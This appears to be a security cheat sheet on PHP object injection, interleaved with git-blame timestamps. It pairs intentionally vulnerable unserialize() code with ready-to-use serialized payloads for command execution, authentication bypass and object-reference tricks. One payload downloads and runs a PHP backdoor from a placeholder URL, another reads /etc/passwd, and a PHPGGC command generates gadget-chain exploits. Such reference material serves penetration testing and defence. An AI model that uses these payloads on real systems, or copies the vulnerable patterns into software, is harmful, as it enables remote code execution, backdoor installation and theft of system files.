2018-11-26 22:35:43 +00:00
# PHP Object injection
2018-08-12 21:30:22 +00:00
PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
2016-10-18 08:01:56 +00:00
2018-11-26 22:35:43 +00:00
The following magic methods will help you for a PHP Object injection
* __wakeup() when an object is unserialized.
* __destruct() when an object is deleted.
* __toString() when an object is converted to a string.
2019-03-19 12:18:06 +00:00
Also you should check the `Wrapper Phar://` in [File Inclusion ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#wrapper-phar ) which use a PHP object injection.
2018-08-19 16:47:32 +00:00
2018-11-26 22:35:43 +00:00
## __wakeup in the unserialize function
2018-08-12 21:30:22 +00:00
2018-07-09 17:49:56 +00:00
Vulnerable code:
2018-08-12 21:30:22 +00:00
2018-07-09 17:49:56 +00:00
```php
< ?php
class PHPObjectInjection{
public $inject;
function __construct(){
}
function __wakeup(){
if(isset($this->inject)){
eval($this->inject);
}
}
}
if(isset($_REQUEST['r'])){
$var1=unserialize($_REQUEST['r']);
2018-08-12 21:30:22 +00:00
if(is_array($var1)){
2018-07-09 17:49:56 +00:00
echo "< br / > ".$var1[0]." - ".$var1[1];
}
}
else{
echo ""; # nothing happens here
}
?>
```
Payload:
2018-08-12 21:30:22 +00:00
2018-07-09 17:49:56 +00:00
```php
# Basic serialized data
a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
# Command execution
string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
```
2016-10-18 08:01:56 +00:00
2018-09-25 21:59:29 +00:00
## Authentication bypass
2018-09-25 22:13:19 +00:00
### Type juggling
2018-09-25 21:59:29 +00:00
Vulnerable code:
```php
< ?php
$data = unserialize($_COOKIE['auth']);
if ($data['username'] == $adminName & & $data['password'] == $adminPassword) {
$admin = true;
} else {
$admin = false;
}
```
Payload:
2018-11-26 22:35:43 +00:00
```php
2018-09-25 21:59:29 +00:00
a:2:{s:8:"username";b:1;s:8:"password";b:1;}
```
2018-11-26 22:35:43 +00:00
Because `true == "str"` is true.
2018-09-25 21:59:29 +00:00
2018-09-25 22:13:19 +00:00
### Object reference
Vulnerable code:
```php
< ?php
class Object
{
var $guess;
var $secretCode;
}
$obj = unserialize($_GET['input']);
if($obj) {
$obj->secretCode = rand(500000,999999);
if($obj->guess === $obj->secretCode) {
echo "Win";
}
}
?>
```
Payload:
2018-11-26 22:35:43 +00:00
```php
2018-09-25 22:13:19 +00:00
O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
```
2018-07-09 17:49:56 +00:00
## Others exploits
2018-08-12 21:30:22 +00:00
2016-10-20 04:02:19 +00:00
Reverse Shell
2018-08-12 21:30:22 +00:00
2016-10-20 04:02:19 +00:00
```php
class PHPObjectInjection
{
2018-08-12 21:30:22 +00:00
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php & & php phpobjbackdoor.php');";
2016-10-20 04:02:19 +00:00
}
echo urlencode(serialize(new PHPObjectInjection));
2016-10-18 08:01:56 +00:00
```
2016-10-20 04:02:19 +00:00
Basic detection
2018-08-12 21:30:22 +00:00
2016-10-20 04:02:19 +00:00
```php
class PHPObjectInjection
{
2018-08-12 21:30:22 +00:00
// CHANGE URL/FILENAME TO MATCH YOUR SETUP
public $inject = "system('cat /etc/passwd');";
2016-10-20 04:02:19 +00:00
}
echo urlencode(serialize(new PHPObjectInjection));
//O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
//'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
2016-10-18 08:01:56 +00:00
```
2018-10-01 10:30:14 +00:00
## Finding and using gadgets
[PHPGGC ](https://github.com/ambionics/phpggc ) is a tool built to generate the payload based on several frameworks:
- Laravel
- Symfony
- SwiftMailer
- Monolog
- SlimPHP
- Doctrine
- Guzzle
```powershell
phpggc monolog/rce1 'phpinfo();' -s
```
2018-11-27 22:04:17 +00:00
## Real world examples
* [Vanilla Forums ImportController index file_exists Unserialize Remote Code Execution Vulnerability - Steven Seeley ](https://hackerone.com/reports/410237 )
* [Vanilla Forums Xenforo password splitHash Unserialize Remote Code Execution Vulnerability - Steven Seeley ](https://hackerone.com/reports/410212 )
* [Vanilla Forums domGetImages getimagesize Unserialize Remote Code Execution Vulnerability (critical) - Steven Seeley ](https://hackerone.com/reports/410882 )
* [Vanilla Forums Gdn_Format unserialize() Remote Code Execution Vulnerability - Steven Seeley ](https://hackerone.com/reports/407552 )
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
2018-11-26 22:35:43 +00:00
* [PHP Object Injection - OWASP ](https://www.owasp.org/index.php/PHP_Object_Injection )
* [PHP Object Injection - Thin Ba Shane ](http://location-href.com/php-object-injection/ )
* [PHP unserialize ](http://php.net/manual/en/function.unserialize.php )
* [PHP Generic Gadget - ambionics security ](https://www.ambionics.io/blog/php-generic-gadget-chains )
* [POC2009 Shocking News in PHP Exploitation ](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf )
* [PHP Internals Book - Serialization ](http://www.phpinternalsbook.com/classes_objects/serialization.html )
2019-03-20 06:49:25 +00:00
* [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec ](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web )
* [CTF writeup: PHP object injection in kaspersky CTF ](https://medium.com/@jaimin_gohel/ctf-writeup-php-object-injection-in-kaspersky-ctf-28a68805610d )